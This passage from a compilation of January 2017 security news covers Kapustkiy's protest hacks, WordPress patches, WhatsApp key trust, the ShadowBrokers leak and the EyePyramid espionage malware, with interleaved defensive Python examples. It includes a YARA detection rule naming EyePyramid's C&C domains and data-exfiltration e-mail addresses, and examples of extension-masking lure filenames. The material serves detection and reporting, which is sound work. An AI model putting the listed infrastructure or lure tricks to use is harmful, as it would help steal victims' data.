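HARDENED_CONFIG = """
cluster.name: test-cluster
network.host: 127.0.0.1      # only reachable through a local facade
script.inline: false
script.disable_dynamic: true
"""

CAT_INDICES_AFTER_ATTACK = """\
health status index   uuid                   pri rep docs.count docs.deleted store.size pri.store.size
yellow open   warning c0nstructedUUID00001   5   1          1            0      4.3kb          4.3kb
"""

CAT_INDICES_HEALTHY = """\
health status index           uuid                   pri rep docs.count docs.deleted store.size pri.store.size
green  open   logs-2017.01.13 c0nstructedUUID00002   5   1     120483            0     64.2mb         32.1mb
"""

if __name__ == "__main__":
    print("weak:", audit_config(WEAK_CONFIG))
    print("hardened:", audit_config(HARDENED_CONFIG))
    print("ransom index:", find_ransom_indices(CAT_INDICES_AFTER_ATTACK))
```

The bind-address check is the one that matters most here: a loopback-only node behind a facade that authenticates and filters requests is out of reach of the mass scans that fed these attacks, whatever the scripting settings say.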

@Kapustkiy is back and hacked the Government of Venezuela
14.1.2017 securityaffairs Hacking

The popular hacker Kapustkiy hacked a website belonging to the Government of Venezuela in protest against the dictatorship of Nicolas Maduro.
The white hat hacker Kapustkiy has hacked the Government of Venezuela and leaked data on Pastebin (http://pastebin.com/ud0pewGL).

Kapustkiy hacked the website www.gdc.gob.ve by exploiting a Local File Inclusion (LFI) vulnerability in:


“I have found a LFI in the Capital website of the Government of Venezuela. And I hacked other two websites by exploiting a SQLi. I found around 800 users in the second website and the third website had 52 accounts.” said Kapustkiy. “I hacked them in protest against the dictatorship of Nicolas Maduro.”

The hacker acted in protest against the President of Venezuela, explaining that he is destroying the lives of innocent people.

“Hacked By Kapustkiy from New World Hackers. I am against the dictatorship of Nicolas Maduro on Venezuela. I am tired of seeing, Nicolas Maduro is still running as president. It is time to leave, you motherfucker.” states the manifesto published on PasteBin.

Kapustkiy currently works as a white hat hacker reporting flaws, but this time he made an exception for political motivations.

In December 2016, Kapustkiy hacked the Russian Visa Center in the USA and accessed information of around 3000 individuals.

In the same month, the young hacker hacked the website of the Costa Rica Embassy in China and breached the Slovak Chamber of Commerce (www.scci.sk), affecting more than 4,000 user records.

In 2016, Kapustkiy targeted several organizations, including the Consular Department of the Embassy of the Russian Federation, the Argentinian Ministry of Industry, the National Assembly of Ecuador, the Venezuela Army, the High Commission of Ghana & Fiji in India, the India Regional Council as well as organizations and embassies across the world.

He also broke into the ‘Dipartimento della Funzione Pubblica’ Office of the Italian Government, the Paraguay Embassy of Taiwan (www.embapartwroc.com.tw), and the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya.

WordPress 4.7.1 released, patches eight vulnerabilities and 62 bugs
14.1.2017 securityaffairs

According to the release notes, the latest version of WordPress, 4.7.1, addresses eight security vulnerabilities and 62 other bugs.
On Wednesday the WordPress Team released WordPress 4.7.1, classified as a security release for all previous versions. According to the release notes, the new version addresses eight security flaws and 62 other bugs.

According to the WordPress team, the previous WordPress 4.7 release has been downloaded over 10 million times since its release on December 6, 2016.

The PHPMailer library was updated to patch a remote code execution (RCE) vulnerability, tracked as CVE-2016-10033. Aaron D. Campbell, WordPress Core developer, says that “No specific issue appears to affect WordPress or any of the major plugins we investigated but, out of an abundance of caution, we updated PHPMailer in this release”.

The experts, Brian Krogsgard and Chris Jean, discovered that the REST API “exposed data on all users who had authored a post of a public post type.”


The new version addresses two cross-site scripting (XSS) vulnerabilities.

“Cross-site scripting (XSS) via the plugin name or version header on update-core.php. Reported by Dominik Schilling of the WordPress Security Team.” reads the advisory.

The second XSS resides in the “theme name fallback” and was reported by Mehmet Ince.

Among the issues fixed by the WordPress Team, there are also two Cross-site request forgery (CSRF) vulnerabilities.

The first, a CSRF bypass exploitable by uploading a specially crafted Flash file, was reported by Abdullah Hussam, while Ronnie Skansing reported the second, a CSRF in the accessibility mode of widget editing.

The new release also fixes a weak cryptographic security issue related to the multisite activation key, discovered by Jack, who described it in a blog post.

Another issue, discovered by John Blackbourn of the WordPress Security Team, is that the “post via email” feature checks mail.example.com if the default settings aren’t changed.

“Download WordPress 4.7.1 or venture over to Dashboard → Updates and simply click “Update Now.” Sites that support automatic background updates are already beginning to update to WordPress 4.7.1” states the advisory.

A report recently issued by the security firm Sucuri claims that WordPress continues to be the most hacked CMS.

As explained in this article published weeks ago by Pierluigi Paganini, more than 8,800 WordPress plugins out of 44,705 are flawed.

“Security firm RIPS Technologies has analyzed 44,705 in the official WordPress plugins directory and discovered that more than 8,800 of them are flawed.” states the post.

WhatsApp Backdoor allows Hackers to Intercept and Read Your Encrypted Messages
13.1.2017 thehackernews
Most people believe that end-to-end encryption is the ultimate way to protect your secret communication from snooping, and it is, but it can still be intercepted if not implemented correctly.
After introducing "end-to-end encryption by default" last year, WhatsApp has become the world's largest secure messaging platform with over a billion users worldwide.
But if you think your conversations are completely secure, such that no one, not even Facebook, the company that owns WhatsApp, can intercept your messages, then you are highly mistaken, just like most of us, and it's not a new concept.
Here's the kicker: end-to-end encrypted messaging services such as WhatsApp and Telegram contain a backdoor that can be used, if necessary, by the company, and of course by hackers or intelligence agencies, to intercept and read your end-to-end encrypted messages, all without breaking the encryption.

And that backdoor is — TRUST.
No doubt most encrypted messaging services generate and store the private encryption key offline on your device and only broadcast the public key to other users through the company's server.
In the case of WhatsApp, for example, we have to trust that the company will not alter the public key exchange mechanism between sender and receiver to perform a man-in-the-middle attack and snoop on your encrypted private communication.
Tobias Boelter, a security researcher from the University of California, has reported that WhatsApp's end-to-end encryption, based on the Signal protocol, has been implemented in such a way that if WhatsApp or any hacker intercepts your chats by exploiting the trust-based key exchange mechanism, you will never know that a change in encryption key has occurred in the background. YES, that's possible.
Note that this backdoor has nothing to do with the Signal encryption protocol, created by Open Whisper Systems. It's one of the most secure encryption protocols if implemented correctly.
“WhatsApp has implemented a backdoor into the Signal protocol, giving itself the ability to force the generation of new encryption keys for offline users and to make the sender re-encrypt messages with new keys and send them again for any messages that have not been marked as delivered. The recipient is not made aware of this change in encryption.” The Guardian reports.
However, users can receive notifications when security codes change, but only if the "security notifications" option has been turned ON manually in the app settings.

Meanwhile, Fredric Jacobs, who was an iOS developer at Open Whisper Systems, also reacted on Twitter and admitted that "if you don't verify keys Signal/WhatsApp/... can man-in-the-middle your communications," though he also added, "It's ridiculous that this is presented as a backdoor. If you don't verify keys, authenticity of keys is not guaranteed. Well known fact."
Facebook Hasn't Fixed It Since June 2016
Boelter told the Guardian that he reported the backdoor to Facebook in April 2016 -- the time when WhatsApp implemented end-to-end encryption by default in its messaging app.
However, the researcher was told in reply that Facebook was already aware of the issue and justified it as an "expected behavior."
"WhatsApp says that it implemented the backdoor to aid usability. If the backdoor is not in place, messages sent to an offline user, who then changes their smartphone or has to re-install WhatsApp and in doing so generates new security keys for themselves, would remain undelivered once the user comes back online." The Guardian says.
"In many parts of the world, people frequently change devices and Sim cards. In these situations, we want to make sure people’s messages are delivered, not lost in transit." a WhatsApp spokesperson told the Guardian.
And Yeah, the backdoor still exists in WhatsApp.
How to Protect Yourself from Spying?
To prevent the possibility of MITM attacks, WhatsApp also offers a third security layer in its app, using which you can verify the keys of the other users you communicate with, either by scanning a QR code (drawback: physical presence required) or by comparing a 60-digit number over another channel of communication.
"Security codes are just visible versions of the special key shared between you - and don't worry, it's not the actual key itself, that's always kept secret."
However, this option is useful only when you actively verify the authenticity of session keys and, as we know, only one privacy-conscious paranoid user in thousands would do that.
Secure Alternative to Whatsapp
Oh! You must be thinking — which secure messaging service, then, offers protection against such broken trust and interception?
There are several alternatives, such as "Signal Private Messenger" itself, developed by Open Whisper Systems, which is the most recommended secure messaging app.
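The behaviour contrasted in this article and in the “Explained” piece above (automatic trust of a changed key versus holding messages until the sender verifies it) comes down to one decision in the sender's client. The following is an added example, not WhatsApp's or Signal's code: a toy sender-side model in which encryption is represented by tagging a message with the key it was produced for, so that the only thing being compared is the key-change policy. Contact names and key identifiers are constructed.

```python
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Contact:
    name: str
    key_id: str             # identity key on file; its fingerprint is what the apps show as the "security code"
    verified: bool = False  # True once the user compared codes out of band (QR scan / 60-digit number)


@dataclass
class Message:
    to: str
    text: str
    key_id: str             # key the ciphertext was produced for (encryption modelled as tagging, no real crypto)
    delivered: bool = False


class Messenger:
    """Sender-side model of the two policies discussed in the text.

    auto_trust=True : a changed key is accepted at once and undelivered messages are
                      re-encrypted for it (the WhatsApp default described above).
    auto_trust=False: delivery stops until the user verifies the new key (Signal's default).
    """

    def __init__(self, auto_trust, security_notifications=False):
        self.auto_trust = auto_trust
        self.security_notifications = security_notifications
        self.contacts: Dict[str, Contact] = {}
        self.outbox: List[Message] = []
        self.log: List[str] = []

    def add_contact(self, name, key_id, verified=False):
        self.contacts[name] = Contact(name, key_id, verified)

    def send(self, name, text):
        contact = self.contacts[name]
        msg = Message(name, text, contact.key_id)      # encrypted for the key currently on file
        self.outbox.append(msg)
        self.log.append(f"queued for {name} under {contact.key_id}")
        return msg

    def pending(self, name):
        return [m for m in self.outbox if m.to == name and not m.delivered]

    def _deliver(self, msgs, key_id):
        for m in msgs:
            m.key_id = key_id          # (re-)encrypt for this key and hand to the server
            m.delivered = True

    def key_changed(self, name, new_key_id):
        """The server announces a new key for `name`: a phone swap, a reinstall, or an impostor."""
        contact = self.contacts[name]
        contact.key_id, contact.verified = new_key_id, False
        queued = self.pending(name)
        if self.auto_trust:
            self._deliver(queued, new_key_id)
            self.log.append(f"re-encrypted {len(queued)} message(s) for {name} under {new_key_id} and delivered")
            if self.security_notifications:
                self.log.append(f"notice: security code for {name} changed")  # shown only after delivery
        else:
            self.log.append(f"held {len(queued)} message(s) for {name}: security code changed, verify first")

    def verify(self, name):
        """The user compared the new security code out of band; release anything held."""
        contact = self.contacts[name]
        contact.verified = True
        held = self.pending(name)
        self._deliver(held, contact.key_id)
        self.log.append(f"verified {name}; delivered {len(held)} held message(s)")

    def delivered_under(self, name):
        """Key identifiers the delivered messages to `name` were encrypted for."""
        return [m.key_id for m in self.outbox if m.to == name and m.delivered]


def run_scenario(auto_trust):
    """Alice queues a message while Bob is offline; the server then announces an
    unexpected key for Bob before the message is delivered. Returns what happened."""
    alice = Messenger(auto_trust=auto_trust, security_notifications=True)
    alice.add_contact("bob", "KEY-bob-original", verified=True)
    alice.send("bob", "meet at 9")
    alice.key_changed("bob", "KEY-unexpected")   # constructed: reinstall or impostor, Alice cannot tell which
    return {
        "delivered_under": alice.delivered_under("bob"),
        "held": len(alice.pending("bob")),
        "log": alice.log,
    }


if __name__ == "__main__":
    for policy in (True, False):
        print("auto_trust =", policy, run_scenario(policy))
```

With `auto_trust=True` the queued message is delivered under `KEY-unexpected` before the notice appears, which is exactly the ordering both articles criticise; with `auto_trust=False` it stays in the outbox until `verify()` is called, so whoever holds the new key only ever receives messages the sender chose to release.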

ShadowBrokers exits releasing another arsenal of tools to hack Windows
13.1.2017 securityaffairs BigBrothers

The ShadowBrokers hacking group that broke into the NSA arsenal and stole its hacking tools is signing off, leaving a gift to the security community.
The mysterious hacking group calling themselves “The Shadow Brokers” has apparently decided to put an end to their failed attempts to sell exploits and hacking tools they claimed to have stolen from the NSA-linked Equation Group.
A few days ago the notorious hacker group Shadow Brokers announced the sale of an archive of Windows exploits and hacking tools stolen from the NSA-linked Equation group.


The ShadowBrokers is the hacker crew that leaked a portion of the arsenal of the NSA-Linked Equation Group, a database containing hacking tools and exploits.

In October 2016, the hackers leaked a dump containing a list of servers that were hacked by the NSA-linked group known as Equation Group.

The Equation Group compromised these targets using hacking tools codenamed INTONATION and PITCHIMPAIR. The ShadowBrokers provided links to two distinct PGP-encrypted archives: the first was offered for free as proof of the hack (its passphrase was ‘auctioned’), while for the second the group requested 1 million BTC.

The first archive contained roughly 300MB of data, including firewall exploits, hacking tools, and scripts with cryptonyms like BANANAUSURPER, BLATSTING, and BUZZDIRECTION.

The Equation Group’s hackers targeted products made by Cisco, Fortigate, Juniper, TOPSEC, and Watchguard.

In early October, TheShadowBrokers complained that no one seemed to be bidding on their precious archive; an alleged member of the group expressed dissent over the lack of interest in ponying up bitcoins to release the full NSA data dump.

In December 2016, the group announced the launch of a crowdfunding campaign for the stolen arsenal because its auction had received offers for less than two bitcoins.

Later that month they changed the sales model, offering the NSA’s hacking arsenal for direct sale on an underground website.

Now the group has decided to exit the scene: according to a message published on the website it used for direct sales of the hacking tools, the hackers will go dark because continuing their activities is too risky.

The group explained that their main goal was the sale of the stolen hacking tools and exploits, but no one has bought them.

The Shadow Brokers crew published a Bitcoin address, explaining that they would return if someone pays 10,000 Bitcoins for the exploits. The offer will be valid forever.

Before leaving the cyber arena, the group decided to release some gifts: a collection of 58 Windows hacking tools that are able to evade detection by security solutions. If you are interested in downloading the archive, visit the group’s website on ZeroNet:


Donald Trump appoints a CyberSecurity Advisor Whose Own Site is Damn Vulnerable
13.1.2017 thehackernews
Former New York City Mayor Rudolph W. Giuliani has been appointed as a cyber security advisor for the President-elect Donald Trump, but it appears that he never actually checked the security defenses of his own company's website.
Giuliani is going to head a new Cybersecurity Working Group for the President-elect, and "will be sharing his expertise and insight as a trusted friend concerning private sector cyber security problems and emerging solutions developing in the private sector," Trump's Transition Team announced Thursday.
The Trump administration appointed Giuliani citing his 16 years of experience "providing security solutions in the private sector," but the news met online criticism, with many users on Twitter asking:
'What does the former New York mayor know about cyber security?'

As the news broke, online users started scanning his website "www.giulianisecurity.com" and found that the site for Giuliani Security & Safety is simply a disaster.
The site runs on an old version of Joomla! — a free, open-source content management system (CMS) — which is vulnerable to more than a dozen flaws.
The website also uses an outdated version of the PHP scripting language, has an expired SSL certificate, runs on a 10-year-old version of the FreeBSD server OS and fails to follow other basic security practices.
According to Robert Graham of Errata Security, Giuliani did not build the site himself; instead he "contracted with some generic web designer to put up a simple page with just some basic content."
"There's nothing on Giuliani's server worth hacking. The drama over his security, while an amazing joke, is actually meaningless," Graham said in a blog post. "All this tells us is that Verio/NTT.net is a crappy hosting provider, not that Giuliani has done anything wrong."
Although it really doesn't matter who created the website, if you are in the cyber security business to "help the government plan to make us more secure," such ignorance hardly inspires confidence in that person's expertise.

Giuliani is the CEO of his own private-sector cybersecurity venture, Giuliani Partners, which is an international cyber security consulting firm that claims to offer "a comprehensive range of security and crisis management services."
What Giuliani Partners actually does is not known, because the company promotes its crime reduction successes in various countries, but not its cybersecurity work.
The venture recently struck a deal with BlackBerry to provide companies and governments cyber security support by assessing infrastructures, identifying potential cyber security vulnerabilities, addressing gaps and securing endpoints "with the goal of offering another channel to bring customers to a new standard of security."
This clearly suggests that the company is doing something right.
Many details about Giuliani's role in the Trump administration were not immediately available. We'll update the story with new developments.

The “EyePyramid” attacks
13.1.2017 Kaspersky Cyber
On January 10, 2017, a court order was declassified by the Italian police, in regards to a chain of cyberattacks directed at top Italian government members and institutions.

The attacks leveraged a malware named “EyePyramid” to target a dozen politicians, bankers, prominent freemasons and law enforcement personalities in Italy. These included Fabrizio Saccomanni, the former deputy governor of the Bank of Italy, Piero Fassino, the former mayor of Turin, several members of a Masonic lodge, Matteo Renzi, former prime minister of Italy and Mario Draghi, president of the European Central Bank.

The malware was spread using spear-phishing emails, and its level of sophistication is low. However, the malware is flexible enough to grant access to all the resources in the victim’s computer.

During the investigation, the law enforcement agencies involved found more than 100 active victims on the server used to host the malware, as well as indications that during the last few years the attackers had targeted around 16,000 victims. All identified victims are in Italy, most of them law firms, consultancy services, universities and even Vatican cardinals.

Evidence found on the C&C servers suggests that the campaign was active since at least March 2014 and lasted until August 2016. However, it is suspected that the malware was developed and probably used years before, possibly as far back as 2008.

Two suspects were arrested on January 10th, 2017 and identified as 45-year-old nuclear engineer Giulio Occhionero and his 47-year-old sister Francesca Maria Occhionero.


Although the Italian police report doesn’t include malware hashes, it identifies a number of C&C servers and e-mail addresses used by the malware for exfiltration of stolen data.

Excerpt from the Italian court order on #EyePyramid

Some of the e-mail addresses used for exfiltration and C&C domains outlined by the police report follow:

E-mail Addresses used for exfiltration
Command-and-Control Servers
Based on these indicators we quickly wrote a YARA rule and ran it through our systems to see if it matched any samples.

Here’s how our initial, “blindly” written YARA rule looked:

rule crime_ZZ_EyePyramid {

meta:
    copyright = "Kaspersky Lab"
    author = "Kaspersky Lab"
    maltype = "crimeware"
    filetype = "Win32 EXE"
    date = "2016-01-11"
    version = "1.0"

strings:
    $a0="eyepyramid.com" ascii wide nocase fullword
    $a1="hostpenta.com" ascii wide nocase fullword
    $a2="ayexisfitness.com" ascii wide nocase fullword
    $a3="enasrl.com" ascii wide nocase fullword
    $a4="eurecoove.com" ascii wide nocase fullword
    $a5="marashen.com" ascii wide nocase fullword
    $a6="millertaylor.com" ascii wide nocase fullword
    $a7="occhionero.com" ascii wide nocase fullword
    $a8="occhionero.info" ascii wide nocase fullword
    $a9="wallserv.com" ascii wide nocase fullword
    $a10="westlands.com" ascii wide nocase fullword
    // $a11 to $a15: five further strings whose values are missing from the page as extracted
    $a16="MN600-849590C695DFD9BF69481597241E-668C" ascii wide nocase fullword
    $a17="MN600-841597241E8D9BF6949590C695DF-774D" ascii wide nocase fullword
    $a18="MN600-3E3A3C593AD5BAF50F55A4ED60F0-385D" ascii wide nocase fullword
    $a19="MN600-AD58AF50F55A60E043E3A3C593ED-874A" ascii wide nocase fullword
    $a20="gpool@hostpenta.com" ascii wide nocase fullword
    $a21="hanger@hostpenta.com" ascii wide nocase fullword
    $a22="hostpenta@hostpenta.com" ascii wide nocase fullword
    $a23="ulpi715@gmx.com" ascii wide nocase fullword
    $b0="purge626@gmail.com" ascii wide fullword
    $b1="tip848@gmail.com" ascii wide fullword
    $b2="dude626@gmail.com" ascii wide fullword
    $b3="octo424@gmail.com" ascii wide fullword
    $b4="antoniaf@poste.it" ascii wide fullword
    $b5="mmarcucci@virgilio.it" ascii wide fullword
    $b6="i.julia@blu.it" ascii wide fullword
    $b7="g.simeoni@inwind.it" ascii wide fullword
    $b8="g.latagliata@live.com" ascii wide fullword
    $b9="rita.p@blu.it" ascii wide fullword
    $b10="b.gaetani@live.com" ascii wide fullword
    $b11="gpierpaolo@tin.it" ascii wide fullword
    $b12="e.barbara@poste.it" ascii wide fullword
    $b13="stoccod@libero.it" ascii wide fullword
    $b14="g.capezzone@virgilio.it" ascii wide fullword
    $b15="baldarim@blu.it" ascii wide fullword
    $b16="elsajuliette@blu.it" ascii wide fullword
    $b17="dipriamoj@alice.it" ascii wide fullword
    $b18="izabelle.d@blu.it" ascii wide fullword
    $b19="lu_1974@hotmail.com" ascii wide fullword
    $b20="tim11235@gmail.com" ascii wide fullword
    $b21="plars575@gmail.com" ascii wide fullword
    $b22="guess515@fastmail.fm" ascii wide fullword

condition:
    ((uint16(0) == 0x5A4D)) and (filesize < 10MB) and
    ((any of ($a*)) or (any of ($b*)) )
}

To build the YARA rule above we used every bit of available information: the custom e-mail addresses used for exfiltration, the C&C servers, the licenses for the custom mailing library used by the attackers and the specific IP addresses used in the attacks.
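To make explicit what the rule's condition and string modifiers actually test, here is an added Python reimplementation of that logic (this is example code written for this page, not Kaspersky's tooling). It checks the "MZ" header and size limit, then searches for a subset of the rule's indicators both as plain ASCII and as UTF-16LE ("wide", the encoding .NET binaries use for string literals), honouring "fullword" boundaries and the case-sensitivity difference between the $a and $b groups. The sample buffer is constructed for the demonstration and is not a real EyePyramid file.

```python
import re

# Indicators copied from the "blind" EyePyramid YARA rule quoted above.
# NOCASE_INDICATORS corresponds to the rule's $a strings (nocase),
# CASE_INDICATORS to its $b strings (case-sensitive).
NOCASE_INDICATORS = [
    "eyepyramid.com",
    "hostpenta.com",
    "occhionero.com",
    "MN600-849590C695DFD9BF69481597241E-668C",
]
CASE_INDICATORS = [
    "purge626@gmail.com",
    "tip848@gmail.com",
]

MAX_FILESIZE = 10 * 1024 * 1024  # the rule's "filesize < 10MB"
ALNUM = rb"[A-Za-z0-9]"          # YARA's notion of a word character for "fullword"


def _ascii_pattern(indicator, nocase):
    """Regex equivalent of the YARA modifiers ``ascii fullword`` (plus ``nocase``)."""
    flags = re.IGNORECASE if nocase else 0
    body = re.escape(indicator.encode("ascii"))
    return re.compile(rb"(?<!" + ALNUM + rb")" + body + rb"(?!" + ALNUM + rb")", flags)


def _wide_pattern(indicator, nocase):
    """Regex equivalent of ``wide fullword``: UTF-16LE, i.e. each ASCII byte followed by NUL."""
    flags = re.IGNORECASE if nocase else 0
    body = b"".join(re.escape(bytes([c])) + b"\x00" for c in indicator.encode("ascii"))
    # A neighbouring UTF-16LE letter or digit would make this a partial-word hit.
    return re.compile(rb"(?<!" + ALNUM + rb"\x00)" + body + rb"(?!" + ALNUM + rb"\x00)", flags)


_COMPILED = (
    [(i, _ascii_pattern(i, True), _wide_pattern(i, True)) for i in NOCASE_INDICATORS]
    + [(i, _ascii_pattern(i, False), _wide_pattern(i, False)) for i in CASE_INDICATORS]
)


def scan(data: bytes) -> dict:
    """Apply the rule's condition to a byte buffer and report which indicators hit."""
    is_pe = data[:2] == b"MZ"            # uint16(0) == 0x5A4D, little-endian "MZ"
    size_ok = len(data) < MAX_FILESIZE
    hits = []
    for indicator, ascii_pat, wide_pat in _COMPILED:
        if ascii_pat.search(data):
            hits.append((indicator, "ascii"))
        if wide_pat.search(data):
            hits.append((indicator, "wide"))
    return {"is_pe": is_pe, "size_ok": size_ok, "hits": hits,
            "match": is_pe and size_ok and bool(hits)}


# Constructed sample (not a real file): a fake MZ stub, an ASCII config fragment with the
# domain in upper case, then an e-mail address stored as a UTF-16LE literal.
SAMPLE = (
    b"MZ" + b"\x90" * 62
    + b"server=EYEPYRAMID.COM;\x00\x00"
    + "tip848@gmail.com".encode("utf-16-le")
    + b"\x00\x00padding"
)

if __name__ == "__main__":
    print(scan(SAMPLE))
```

The wide-string handling is the detail worth noticing: a grep for the ASCII e-mail address would miss the UTF-16LE copy, which is exactly why the original rule carries the "wide" modifier on every indicator.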

Once the YARA rule was ready, we ran it on our malware collections. Two of the initial hits were:

MD5: 778d103face6ad7186596fb0ba2399f2
File size: 1396224 bytes
Type: Win32 PE file
Compilation timestamp: Fri Nov 19 12:25:00 2010

MD5: 47bea4236184c21e89bd1c1af3e52c86
File size: 1307648 bytes
Type: Win32 PE file
Compilation timestamp: Fri Sep 17 11:48:59 2010
These two samples allowed us to write a more specific and more effective YARA rule which identified 42 other samples in our summary collections.

At the end of this blogpost we include a full list of all related samples identified.

Although very thorough, the Police Report does not include any technical details about how the malware was spread other than the use of spear phishing messages with malicious attachments using spoofed email addresses.

Nevertheless, once we were able to identify the samples shown above we used our telemetry to find additional ones used by the attackers for spreading the malware in spear-phishing emails. For example:

From: Di Marco Gianmaria
Subject: ricezione e attivazione
Time: 2014/01/29 13:57:42
Attachment: contatto.zip//Primarie.accdb (…) .exe

From: Michelangelo Giorgianni
Time: 2014/01/28 17:28:56
Attachment: Note.zip//sistemi.pdf (…) .exe

Other attachment filenames observed in attacks include:

Segnalazioni.doc (…) 7z.exe
Final Eight 2012 Suggerimenti Uso Auricolari.exe
Fwd Re olio di colza aggiornamento prezzo.exe
Eventi.bmp (…) .exe
Quotidiano.mdb (…) _7z.exe
Notifica operazioni in sospeso.exe
As can be seen, spreading relied on spear-phishing e-mails with attachments, using social engineering to get the victim to open and execute the attachment. The attachments were ZIP and 7zip archives containing the EyePyramid malware.

The attackers also relied on executable files whose real extension was masked by padding the filename with multiple spaces after a harmless-looking document extension, so that the trailing “.exe” is pushed out of view. This technique is another sign of the low sophistication level of this attack.
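A mail gateway or triage script can flag this naming trick with a few simple checks. The Python below is an added example for this page (not Kaspersky's code): it inspects an attachment name for an executable final extension, a run of whitespace hiding that extension, a document-like decoy extension in front of the padding, and an executable wrapped in an archive (the page writes archive members as archive//member, and the same notation is accepted here). Because the page shows the padding as “(…)”, the padded sample names below are constructed with explicit spaces.

```python
import os
import re

EXECUTABLE_EXT = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
DOCUMENT_EXT = {".doc", ".docx", ".pdf", ".accdb", ".mdb", ".bmp", ".jpg", ".xls", ".txt"}
ARCHIVE_EXT = {".zip", ".7z", ".rar"}

_PADDING = re.compile(r"\s{3,}")                      # three or more whitespace chars
_DECOY = re.compile(r"(\.[A-Za-z0-9]{1,5})\s{3,}")   # an extension followed by padding


def attachment_findings(name: str) -> list:
    """Return the reasons an attachment name looks like an extension-masking lure.

    An empty list means none of the heuristics fired.
    """
    parts = name.split("//")          # "archive.zip//member.exe" -> inspect the member
    member = parts[-1]
    final_ext = os.path.splitext(member)[1].lower()
    findings = []

    if final_ext in EXECUTABLE_EXT:
        findings.append("executable extension %s" % final_ext)

    # Everything before the real extension is what the user sees in a narrow column.
    stem = member[: len(member) - len(final_ext)] if final_ext else member
    pad = _PADDING.search(stem)
    if pad:
        findings.append("%d whitespace characters push the real extension out of view"
                        % len(pad.group()))

    decoy = _DECOY.search(stem)
    if decoy and decoy.group(1).lower() in DOCUMENT_EXT:
        findings.append("document-like decoy extension %s before the padding"
                        % decoy.group(1).lower())

    if (len(parts) > 1
            and os.path.splitext(parts[0])[1].lower() in ARCHIVE_EXT
            and final_ext in EXECUTABLE_EXT):
        findings.append("executable delivered inside archive %s" % parts[0])

    return findings


# Constructed samples modelled on the filenames listed above; the spaces are explicit here.
SAMPLES = [
    "contatto.zip//Primarie.accdb" + " " * 40 + ".exe",
    "Note.zip//sistemi.pdf" + " " * 40 + ".exe",
    "Segnalazioni.doc" + " " * 30 + "7z.exe",
    "Notifica operazioni in sospeso.exe",
    "fattura.pdf",                       # benign control case
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(repr(sample), "->", attachment_findings(sample) or "clean")
```

A plain executable attachment already yields one finding; the padded, archive-wrapped names yield several, which makes them easy to rank above ordinary mail in a review queue.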

High profile victims

Potential high-profile Italian victims (found as recipients of spear-phishing emails according to the police report) include very relevant Italian politicians such as Matteo Renzi or Mario Draghi.

It should be noted, however, that there is no proof that any of them were successfully infected by EyePyramid – only that they were targeted.

Of the more than 100 active victims found in the server, there’s a heavy interest in Italian law firms and lawyers. Further standout victims, organizations, and verticals include:

Professional firms, consultants
Universities
Vaticano
Construction firms
Healthcare
Based on the KSN data for the EyePyramid malware, we observed 92 cases in which the malware was blocked, the vast majority (80%) of them in Italy. Other countries where EyePyramid has been detected include France, Indonesia, Monaco, Mexico, China, Taiwan, Germany and Poland.

Assuming the compilation timestamps are legitimate – and they do appear correct – most of the samples used in the attacks were compiled in 2014 and 2015.


Although the “EyePyramid” malware used by the two suspects is neither sophisticated nor very hard to detect, their operation successfully compromised a large number of victims, including high-profile individuals, resulting in the theft of tens of gigabytes of data.

In general, the operation had very poor OPSEC (operational security); the suspects used IP addresses associated with their company in the attacks, discussed the victims using regular phone calls and through WhatsApp and, when caught, attempted to delete all the evidence.

This indicates they weren’t experts in the field but merely amateurs, who nevertheless succeeded in stealing considerably large amounts of data from their victims.

As seen from other known cyberespionage operations, it’s not necessary for the attackers to use high profile malware, rootkits, or zero-days to run long-standing cyberespionage operations.

Perhaps the most surprising element of this story is that Giulio Occhionero and Francesca Maria Occhionero ran this cyber espionage operation for many years before getting caught.

Kaspersky Lab products successfully detect and remove EyePyramid samples with these verdicts:

A full report #EyePyramid, including technical details of the malware, is available to customers of Kaspersky APT Intelligence Services. Contact: intelreports (at) kaspersky [dot] com.

To learn how to write YARA rules like a GReAT Ninja, consider taking a master class at Security Analyst Summit. – https://sas.kaspersky.com/#trainings

References and Third-Party Articles

Indicators of Compromise



Related hashes identified by @GaborSzappanos:


Backdoor Filenames:


Malicious attachments filenames (weak indicators):

contatto.zip//Primarie.accdb (…) .exe
Note.zip//sistemi.pdf (…) .exe
Segnalazioni.doc (…) 7z.exe
Final Eight 2012 Suggerimenti Uso Auricolari.exe
Fwd Re olio di colza aggiornamento prezzo.exe
Eventi.bmp (…) .exe
Quotidiano.mdb (…) _7z.exe

Holiday 2016 financial cyberthreats overview
13.1.2017 Kaspersky Cyber

Last November we conducted a brief analysis of the threat landscape over the holiday period – from October to December in 2014 and 2015 – to find out if the number of financial cyberattacks during this time differs to that usually seen throughout the year. The retrospective analysis found that the percentage of phishing attacks during this period was higher than the average yearly rate. The dynamics of financial malware attacks also clearly showed that in 2014 and 2015, criminals staged their malicious campaigns to match dates around the Black Friday – Cyber Monday period, and also around Christmas and the New Year.

Based on this data we made the following prognosis: the same holiday period in 2016 will see a spike in cyberattacks. Now that the holidays are over, it is time to find out how accurate that prediction was.

Financial phishing

The numbers

As seen in the table below, unlike in previous years, the difference between the overall yearly results and the results in Q4 is not significant. However, the percentage of financial phishing attacks blocked by Kaspersky Lab products in Q4 2016 was higher than the total average for the year.

Year   Category                  Full year   Q4
2013   Financial phishing total  31.45%      32.02%
2013   E-shop                     6.51%       7.80%
2013   E-banks                   22.20%      18.76%
2013   E-payments                 2.74%       5.46%
2014   Financial phishing total  28.73%      38.49%
2014   E-shop                     7.32%      12.63%
2014   E-banks                   16.27%      17.94%
2014   E-payments                 5.14%       7.92%
2015   Financial phishing total  34.33%      43.38%
2015   E-shop                     9.08%      12.29%
2015   E-banks                   17.45%      18.90%
2015   E-payments                 7.08%      12.19%
2016   Financial phishing total  47.48%      48.13%
2016   E-shop                    10.17%      10.41%
2016   E-banks                   25.76%      26.35%
2016   E-payments                11.55%      11.37%
Moreover, the Q4 2016 results are the highest we’ve seen so far. 48.13% of all phishing attacks registered by Kaspersky Lab products were focused on gleaning users’ financial data, which is 0.65% higher than the average share of financial phishing in 2016, and 4.75% more than in the same period in 2015. However, the holiday period is not the only reason for such a high percentage of financial attacks. Phishing scams are the easiest way for even low level professional criminals to earn money. The preparation and supporting stages for such scams don’t require a lot of specific tools or knowledge, yet they bring a good return. In other words, phishing attacks appear more attractive to criminals due to their ease and affordability, when compared to staging a financial malware attack. This has resulted in the growth in popularity of phishing.

Delivered on time

